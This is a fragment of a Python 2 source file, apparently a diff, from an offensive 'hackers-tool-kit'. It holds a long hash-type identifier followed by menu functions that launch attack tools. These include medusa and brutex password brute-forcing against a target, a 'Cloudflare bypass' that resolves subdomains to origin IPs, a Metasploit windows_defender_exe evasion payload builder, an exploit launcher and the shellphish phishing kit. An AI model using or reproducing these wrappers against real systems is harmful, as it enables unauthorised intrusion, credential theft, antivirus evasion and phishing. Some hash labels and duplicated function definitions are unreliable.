hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def main(): - found = False - while not found: 